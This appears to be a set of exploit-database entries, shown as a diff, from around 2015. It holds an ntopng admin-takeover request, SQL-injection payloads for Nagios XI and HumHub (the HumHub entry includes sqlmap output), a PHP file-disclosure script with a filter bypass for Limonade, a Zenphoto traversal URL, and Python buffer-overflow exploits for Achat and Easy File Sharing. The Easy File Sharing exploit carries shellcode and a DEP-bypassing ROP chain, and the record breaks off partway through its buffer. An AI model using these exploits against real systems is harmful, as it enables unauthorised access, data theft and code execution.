# Contact: dolev at flaresec.com
|
||||
# Vulnerable version: 2.0.151021
|
||||
# Fixed version: 2.2
|
||||
# Link: ntop.org
|
||||
# Date 27.11.2015
|
||||
# CVE-2015-8368
|
||||
|
||||
# Product Details:
|
||||
ntopng is the next generation version of the original ntop, a network traffic probe that shows the network usage, similar to what the popular top Unix command does. ntopng is based on libpcap and it has been written in a portable way in order to virtually run on every Unix platform, MacOSX and on Windows as well.
|
||||
|
||||
# Vulnerability Details:
|
||||
in the latest stable release of ntop-ng it is possible to escalate the privileges of a non-privileged user to the admin account by resetting the password, intercepting the request and replacing the HTTP parameters.
|
||||
|
||||
# Vulnerability Proof of concept
|
||||
1. Login with an unprivileged account
|
||||
2. Change the account password and intercept the request, modify the username= and Cookie user= and change to the admin account
|
||||
Example:
|
||||
GET /lua/admin/password_reset.lua?csrf=XXXXXXXXXXXXXXXXXX&username=admin&old_password=12345&new_password=123456&confirm_new_password=123456 HTTP/1.1
|
||||
Cookie: user=admin; session=XXXXXXXXXXXXXXXXXXXXXXXXX
|
||||
3. Login with the admin account and the password you defined in step #3.
|
||||
|
||||
Voila! you're an administrator.
|
19
platforms/php/remote/38827.txt
Executable file
19
platforms/php/remote/38827.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
source: http://www.securityfocus.com/bid/63754/info
|
||||
|
||||
Nagios XI is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Versions prior to Nagios XI 2012R2.4 are vulnerable.
|
||||
|
||||
POST /nagiosql/index.php HTTP/1.1
|
||||
Host: localhost
|
||||
Content-Length: 69
|
||||
Origin: http://locahost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.76
|
||||
Safari/537.36
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: http://localhost/nagiosql/
|
||||
Cookie: PHPSESSID=httj04vv2g028sbs73v9dqoqs3
|
||||
|
||||
tfUsername=test&tfPassword=%27%29+OR+1%3D1+limit+1%3B--+&Submit=Login
|
54
platforms/php/webapps/38828.php
Executable file
54
platforms/php/webapps/38828.php
Executable file
|
@ -0,0 +1,54 @@
|
|||
source: http://www.securityfocus.com/bid/63771/info
|
||||
|
||||
Limonade framework is prone to a local file-disclosure vulnerability because it fails to sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to obtain sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
|
||||
|
||||
Limonade framework 3.0 vulnerable; other versions may also be affected.
|
||||
|
||||
<?php
|
||||
/** To prevent of time out **/
|
||||
set_time_limit(0);
|
||||
|
||||
/** Error reporting **/
|
||||
error_reporting(0);
|
||||
|
||||
/** Necessary variables **/
|
||||
$url = $argv[1];
|
||||
$data = $argv[2];
|
||||
$needle = $argv[3];
|
||||
|
||||
/** Curl function with appropriate adjustments **/
|
||||
function CurlPost($url='localhost',$data=array())
|
||||
{
|
||||
$ch = curl_init();
|
||||
curl_setopt($ch,CURLOPT_URL,$url);
|
||||
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);
|
||||
curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
|
||||
curl_setopt($ch,CURLOPT_HEADER,1);
|
||||
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
|
||||
curl_setopt($ch,CURLOPT_TIMEOUT,50);
|
||||
curl_setopt($ch,CURLOPT_POST,true);
|
||||
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
|
||||
return curl_exec($ch);
|
||||
curl_close($ch);
|
||||
}
|
||||
|
||||
list($param,$file) = explode(':',$data);
|
||||
|
||||
$FilterBypassing = '....//';
|
||||
for($i=0;$i<10;$i++)
|
||||
{
|
||||
$DataToPost[$param] = $FilterBypassing.$file;
|
||||
$response = CurlPost($url,$DataToPost);
|
||||
if(strstr($response,$needle)!==FALSE)
|
||||
{
|
||||
echo $response;
|
||||
echo "\n\nExploited successfully!\n";
|
||||
echo 'Payload: ',$DataToPost[$param],"\n\n\n";
|
||||
die();
|
||||
}
|
||||
|
||||
$FilterBypassing .= '....//';
|
||||
}
|
||||
?>
|
88
platforms/php/webapps/38831.txt
Executable file
88
platforms/php/webapps/38831.txt
Executable file
|
@ -0,0 +1,88 @@
|
|||
=== LSE Leading Security Experts GmbH - Security Advisory 2015-10-14 ===
|
||||
|
||||
HumHub - SQL-Injection
|
||||
------------------------------------------------------------------------
|
||||
|
||||
Tested Versions
|
||||
===============
|
||||
HumHub 0.11.2 and 0.20.0-beta.2
|
||||
|
||||
Issue Overview
|
||||
==============
|
||||
Vulnerability Type: 89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
|
||||
Technical Risk: high
|
||||
Likelihood of Exploitation: high
|
||||
Vendor: HumHub GmbH & Co. KG
|
||||
Vendor URL: https://www.humhub.org
|
||||
Credits: LSE Leading Security Experts GmbH employee Eric Sesterhenn
|
||||
Advisory URL: https://www.lsexperts.de/advisories/lse-2015-10-14.txt
|
||||
Advisory Status: Public
|
||||
CVE-Number: ----
|
||||
CVE URL: ---
|
||||
|
||||
|
||||
Impact
|
||||
======
|
||||
Enables to read and modify the HumHub Mysql Database.
|
||||
|
||||
|
||||
Issue Description
|
||||
=================
|
||||
While conducting an internal software evaluation, LSE Leading
|
||||
Security Experts GmbH discovered that the humhub social networking
|
||||
software is subject to an sql-injection attack.
|
||||
|
||||
|
||||
Temporary Workaround and Fix
|
||||
============================
|
||||
LSE Leading Security Experts GmbH advises to block
|
||||
access to the humhub software until the vendor
|
||||
provides a patch.
|
||||
|
||||
Proof of Concept
|
||||
================
|
||||
|
||||
Opening the following URL
|
||||
|
||||
http://localhost/humhub/humhub-0.11.2/index.php?r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5%27%22&mode=normal
|
||||
|
||||
shows the SQL-error, which is easily exploitable using sqlmap.
|
||||
|
||||
./sqlmap.py -u 'http://localhost:9933/humhub/humhub-0.11.2/index.php?r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5&mode=normal' --cookie='pm_getting-started-panel=expanded; pm_new-people-panel=expanded; pm_user-statistics-panel=expanded; pm_new-spaces-panel=expanded; pm_spaces-statistics-panel=expanded; sin=f9vou17vnik100rrr5b26v8ip3; CSRF_TOKEN=d94129bfdd49e5d2c628928228519cd6b2c9cf54' --level=2 --risk=2 -p from -a
|
||||
|
||||
...
|
||||
|
||||
---
|
||||
Parameter: from (GET)
|
||||
Type: boolean-based blind
|
||||
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
|
||||
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=-4670 OR 5804=5804#&mode=normal
|
||||
|
||||
Type: error-based
|
||||
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
|
||||
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5 AND (SELECT 7208 FROM(SELECT COUNT(*),CONCAT(0x7170627671,(SELECT (ELT(7208=7208,1))),0x7170786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&mode=normal
|
||||
|
||||
Type: stacked queries
|
||||
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
|
||||
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5;(SELECT * FROM (SELECT(SLEEP(5)))OXGN)#&mode=normal
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
|
||||
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5 AND (SELECT * FROM (SELECT(SLEEP(5)))nBYr)&mode=normal
|
||||
---
|
||||
|
||||
|
||||
|
||||
History
|
||||
=======
|
||||
2015-10-14 Issue discovered
|
||||
2015-10-15 Vendor contacted
|
||||
2015-10-15 Vendor response and hotfix
|
||||
2015-10-20 Vendor releases fixed versions
|
||||
2015-11-30 Advisory release
|
||||
|
||||
GPG Signature
|
||||
=============
|
||||
This advisory is signed with the GPG key of the
|
||||
LSE Leading Security Experts GmbH advisories team.
|
||||
The key can be downloaded here: https://www.lsexperts.de/advisories-key-99E3277C.asc
|
83
platforms/php/webapps/38841.txt
Executable file
83
platforms/php/webapps/38841.txt
Executable file
|
@ -0,0 +1,83 @@
|
|||
[+] Credits: hyp3rlinx
|
||||
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
|
||||
[+] Source:
|
||||
http://hyp3rlinx.altervista.org/advisories/ZEN-PHOTO-1.4.10-LFI.txt
|
||||
|
||||
|
||||
Vendor:
|
||||
====================
|
||||
www.zenphoto.org
|
||||
|
||||
|
||||
Product:
|
||||
===================
|
||||
Zenphoto 1.4.10
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
========================
|
||||
Local File Inclusion
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
======================
|
||||
Zen Photos pluginDoc.php PHP file is vulnerable to local file inclusion
|
||||
that allows attackers
|
||||
to read arbitrary server files outside of the current web directory by
|
||||
injecting "../" directory traversal
|
||||
characters, which can lead to sensitive information disclosure, code
|
||||
execution or DOS on the victims web server.
|
||||
|
||||
|
||||
Local File Inclusion Codes:
|
||||
==========================
|
||||
http://localhost/zenphoto-zenphoto-1.4.10/zp-core/pluginDoc.php?thirdparty=1&extension=../../../xampp/phpinfo
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=====================
|
||||
Vendor Notification: November 10, 2015
|
||||
December 1, 2015 : Public Disclosure
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Local
|
||||
|
||||
|
||||
Severity Level:
|
||||
================
|
||||
High
|
||||
|
||||
|
||||
Description:
|
||||
=====================================================
|
||||
Request Method(s): [+] GET
|
||||
|
||||
|
||||
Vulnerable Product: [+] Zenphoto 1.4.10
|
||||
|
||||
|
||||
Vulnerable Parameter(s): [+] extension
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and that due
|
||||
credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit is given to
|
||||
the author.
|
||||
The author is not responsible for any misuse of the information contained
|
||||
herein and prohibits any malicious use of all security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
by hyp3rlinx
|
78
platforms/windows/remote/36025.py
Executable file
78
platforms/windows/remote/36025.py
Executable file
|
@ -0,0 +1,78 @@
|
|||
#!/usr/bin/python
|
||||
# Author KAhara MAnhara
|
||||
# Achat 0.150 beta7 - Buffer Overflow
|
||||
# Tested on Windows 7 32bit
|
||||
|
||||
import socket
|
||||
import sys, time
|
||||
|
||||
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
|
||||
#Payload size: 512 bytes
|
||||
|
||||
buf = ""
|
||||
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
|
||||
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
|
||||
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
|
||||
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
|
||||
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
|
||||
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
|
||||
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
|
||||
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
|
||||
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
|
||||
buf += "\x47\x42\x39\x75\x34\x4a\x42\x69\x6c\x77\x78\x62\x62"
|
||||
buf += "\x69\x70\x59\x70\x4b\x50\x73\x30\x43\x59\x5a\x45\x50"
|
||||
buf += "\x31\x67\x50\x4f\x74\x34\x4b\x50\x50\x4e\x50\x34\x4b"
|
||||
buf += "\x30\x52\x7a\x6c\x74\x4b\x70\x52\x4e\x34\x64\x4b\x63"
|
||||
buf += "\x42\x4f\x38\x4a\x6f\x38\x37\x6d\x7a\x4d\x56\x4d\x61"
|
||||
buf += "\x49\x6f\x74\x6c\x4f\x4c\x6f\x71\x33\x4c\x69\x72\x4e"
|
||||
buf += "\x4c\x4f\x30\x66\x61\x58\x4f\x5a\x6d\x59\x71\x67\x57"
|
||||
buf += "\x68\x62\x48\x72\x52\x32\x50\x57\x54\x4b\x72\x32\x4e"
|
||||
buf += "\x30\x64\x4b\x6e\x6a\x4d\x6c\x72\x6b\x70\x4c\x4a\x71"
|
||||
buf += "\x43\x48\x39\x53\x71\x38\x6a\x61\x36\x71\x4f\x61\x62"
|
||||
buf += "\x6b\x42\x39\x4f\x30\x4a\x61\x38\x53\x62\x6b\x30\x49"
|
||||
buf += "\x6b\x68\x58\x63\x4e\x5a\x6e\x69\x44\x4b\x6f\x44\x72"
|
||||
buf += "\x6b\x4b\x51\x36\x76\x70\x31\x69\x6f\x46\x4c\x57\x51"
|
||||
buf += "\x48\x4f\x4c\x4d\x6a\x61\x55\x77\x4f\x48\x57\x70\x54"
|
||||
buf += "\x35\x49\x66\x49\x73\x51\x6d\x7a\x58\x6d\x6b\x53\x4d"
|
||||
buf += "\x4e\x44\x34\x35\x38\x64\x62\x38\x62\x6b\x52\x38\x6b"
|
||||
buf += "\x74\x69\x71\x4a\x33\x33\x36\x54\x4b\x7a\x6c\x6e\x6b"
|
||||
buf += "\x72\x6b\x51\x48\x6d\x4c\x6b\x51\x67\x63\x52\x6b\x49"
|
||||
buf += "\x74\x72\x6b\x4d\x31\x7a\x30\x44\x49\x51\x34\x6e\x44"
|
||||
buf += "\x4b\x74\x61\x4b\x51\x4b\x4f\x71\x51\x49\x71\x4a\x52"
|
||||
buf += "\x31\x49\x6f\x69\x50\x31\x4f\x51\x4f\x6e\x7a\x34\x4b"
|
||||
buf += "\x6a\x72\x38\x6b\x44\x4d\x71\x4d\x50\x6a\x59\x71\x64"
|
||||
buf += "\x4d\x35\x35\x65\x62\x4b\x50\x49\x70\x4b\x50\x52\x30"
|
||||
buf += "\x32\x48\x6c\x71\x64\x4b\x72\x4f\x51\x77\x59\x6f\x79"
|
||||
buf += "\x45\x45\x6b\x48\x70\x75\x65\x35\x52\x30\x56\x72\x48"
|
||||
buf += "\x33\x76\x35\x45\x37\x4d\x63\x6d\x49\x6f\x37\x65\x6d"
|
||||
buf += "\x6c\x6a\x66\x31\x6c\x79\x7a\x51\x70\x4b\x4b\x67\x70"
|
||||
buf += "\x53\x45\x6d\x35\x55\x6b\x31\x37\x4e\x33\x32\x52\x30"
|
||||
buf += "\x6f\x42\x4a\x6d\x30\x50\x53\x79\x6f\x37\x65\x70\x63"
|
||||
buf += "\x53\x31\x72\x4c\x30\x63\x4c\x6e\x70\x65\x32\x58\x50"
|
||||
buf += "\x65\x6d\x30\x41\x41"
|
||||
|
||||
|
||||
# Create a UDP socket
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
server_address = ('192.168.91.130', 9256)
|
||||
|
||||
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
|
||||
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
|
||||
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
|
||||
p += "\x62" + "A"*45
|
||||
p += "\x61\x40"
|
||||
p += "\x2A\x46"
|
||||
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
|
||||
p += "\x61\x43" + "\x2A\x46"
|
||||
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
|
||||
p += buf + "A" * (1152 - len(buf))
|
||||
p += "\x00" + "A"*10 + "\x00"
|
||||
|
||||
print "---->{P00F}!"
|
||||
i=0
|
||||
while i<len(p):
|
||||
if i > 172000:
|
||||
time.sleep(1.0)
|
||||
sent = sock.sendto(p[i:(i+8192)], server_address)
|
||||
i += sent
|
||||
sock.close()
|
199
platforms/windows/remote/38829.py
Executable file
199
platforms/windows/remote/38829.py
Executable file
|
@ -0,0 +1,199 @@
|
|||
#!/usr/bin/env python
|
||||
#
|
||||
# Exploit title: Easy File Sharing Web Server v7.2 - Remote SEH Buffer Overflow (DEP bypass with ROP)
|
||||
# Date: 29/11/2015
|
||||
# Exploit Author: Knaps
|
||||
# Contact: @TheKnapsy
|
||||
# Website: http://blog.knapsy.com
|
||||
# Software Link: http://www.sharing-file.com/efssetup.exe
|
||||
# Version: Easy File Sharing Web Server v7.2
|
||||
# Tested on: Windows 7 x64, but should work on any other Windows platform
|
||||
#
|
||||
# Notes:
|
||||
# - based on non-DEP SEH buffer overflow exploit by Audit0r (https://www.exploit-db.com/exploits/38526/)
|
||||
# - created for fun & practice, also because it's not 1998 anymore - gotta bypass that DEP! :)
|
||||
# - bad chars: '\x00' and '\x3b'
|
||||
# - max shellcode size allowed: 1260 bytes
|
||||
#
|
||||
|
||||
import sys, socket, struct
|
||||
|
||||
# ROP chain generated with mona.py - www.corelan.be (and slightly fixed by @TheKnapsy)
|
||||
# Essentially, use PUSHAD to set all parameters and call VirtualProtect() to disable DEP.
|
||||
def create_rop_chain():
|
||||
|
||||
rop_gadgets = [
|
||||
# Generate value of 201 in EAX
|
||||
0x10015442, # POP EAX # RETN [ImageLoad.dll]
|
||||
0xFFFFFDFF, # Value of '-201'
|
||||
0x100231d1, # NEG EAX # RETN [ImageLoad.dll]
|
||||
|
||||
# Put EAX into EBX (other unneccessary stuff comes with this gadget as well...)
|
||||
0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
|
||||
|
||||
# Carry on with the ROP as generated by mona.py
|
||||
0x10015442, # POP EAX # RETN [ImageLoad.dll]
|
||||
0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll]
|
||||
|
||||
# Compensate for the ADD EBX,EAX gadget above, jump over 1 address, which is a dummy writeable location
|
||||
# used solely by the remaining part of the above gadget (it doesn't really do anything for us)
|
||||
0x1001281a, # ADD ESP,4 # RETN [ImageLoad.dll]
|
||||
0x61c73281, # &Writable location [sqlite3.dll]
|
||||
|
||||
# And carry on further as generated by mona.py
|
||||
0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
|
||||
0x61c18d81, # XCHG EAX,EDI # RETN [sqlite3.dll]
|
||||
0x1001d626, # XOR ESI,ESI # RETN [ImageLoad.dll]
|
||||
0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
|
||||
0x10013ad6, # POP EBP # RETN [ImageLoad.dll]
|
||||
0x61c227fa, # & push esp # ret [sqlite3.dll]
|
||||
0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll]
|
||||
|
||||
# Now bunch of ugly increments... unfortunately couldn't find anything nicer :(
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x1001b4f6, # POP ECX # RETN [ImageLoad.dll]
|
||||
0x61c73281, # &Writable location [sqlite3.dll]
|
||||
0x100194b3, # POP EDI # RETN [ImageLoad.dll]
|
||||
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
|
||||
0x10015442, # POP EAX # RETN [ImageLoad.dll]
|
||||
0x90909090, # nop
|
||||
0x100240c2, # PUSHAD # RETN [ImageLoad.dll]
|
||||
]
|
||||
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
|
||||
|
||||
|
||||
# Check command line args
|
||||
if len(sys.argv) <= 1:
|
||||
print "Usage: python poc.py [host] [port]"
|
||||
exit()
|
||||
|
||||
host = sys.argv[1]
|
||||
port = int(sys.argv[2])
|
||||
|
||||
|
||||
# Offsets
|
||||
rop_offset = 2455
|
||||
max_size = 5000
|
||||
seh_offset = 4059
|
||||
eax_offset = 4183
|
||||
|
||||
|
||||
# move ESP out of the way so the shellcode doesn't corrupt itself during execution
|
||||
# metasm > add esp,-1500
|
||||
shellcode = "\x81\xc4\x24\xfa\xff\xff"
|
||||
|
||||
# Just as a PoC, spawn calc.exe. Replace with any other shellcode you want
|
||||
# (maximum size of shellcode allowed: 1260 bytes)
|
||||
#
|
||||
# msfvenom -p windows/exec CMD=calc.exe -b '\x00\x3b' -f python
|
||||
# Payload size: 220 bytes
|
||||
shellcode += "\xbb\xde\x37\x73\xe9\xdb\xdf\xd9\x74\x24\xf4\x58\x31"
|
||||
shellcode += "\xc9\xb1\x31\x31\x58\x13\x83\xe8\xfc\x03\x58\xd1\xd5"
|
||||
shellcode += "\x86\x15\x05\x9b\x69\xe6\xd5\xfc\xe0\x03\xe4\x3c\x96"
|
||||
shellcode += "\x40\x56\x8d\xdc\x05\x5a\x66\xb0\xbd\xe9\x0a\x1d\xb1"
|
||||
shellcode += "\x5a\xa0\x7b\xfc\x5b\x99\xb8\x9f\xdf\xe0\xec\x7f\xde"
|
||||
shellcode += "\x2a\xe1\x7e\x27\x56\x08\xd2\xf0\x1c\xbf\xc3\x75\x68"
|
||||
shellcode += "\x7c\x6f\xc5\x7c\x04\x8c\x9d\x7f\x25\x03\x96\xd9\xe5"
|
||||
shellcode += "\xa5\x7b\x52\xac\xbd\x98\x5f\x66\x35\x6a\x2b\x79\x9f"
|
||||
shellcode += "\xa3\xd4\xd6\xde\x0c\x27\x26\x26\xaa\xd8\x5d\x5e\xc9"
|
||||
shellcode += "\x65\x66\xa5\xb0\xb1\xe3\x3e\x12\x31\x53\x9b\xa3\x96"
|
||||
shellcode += "\x02\x68\xaf\x53\x40\x36\xb3\x62\x85\x4c\xcf\xef\x28"
|
||||
shellcode += "\x83\x46\xab\x0e\x07\x03\x6f\x2e\x1e\xe9\xde\x4f\x40"
|
||||
shellcode += "\x52\xbe\xf5\x0a\x7e\xab\x87\x50\x14\x2a\x15\xef\x5a"
|
||||
shellcode += "\x2c\x25\xf0\xca\x45\x14\x7b\x85\x12\xa9\xae\xe2\xed"
|
||||
shellcode += "\xe3\xf3\x42\x66\xaa\x61\xd7\xeb\x4d\x5c\x1b\x12\xce"
|
||||
shellcode += "\x55\xe3\xe1\xce\x1f\xe6\xae\x48\xf3\x9a\xbf\x3c\xf3"
|
||||
shellcode += "\x09\xbf\x14\x90\xcc\x53\xf4\x79\x6b\xd4\x9f\x85"
|
||||
|
||||
|
||||
buffer = "A" * rop_offset # padding
|
||||
buffer += create_rop_chain()
|
||||
buffer += shellcode
|
||||
buffer += "A" * (seh_offset - len(buffer)) # padding
|
||||
buffer += "BBBB" # overwrite nSEH pointer
|
||||
buffer += struct.pack("<I", 0x1002280a) # overwrite SEH record with stack pivot (ADD ESP,1004 # RETN [ImageLoad.dll])
|
||||
buffer += "A" * (eax_offset - len(buffer)) # padding
|
||||
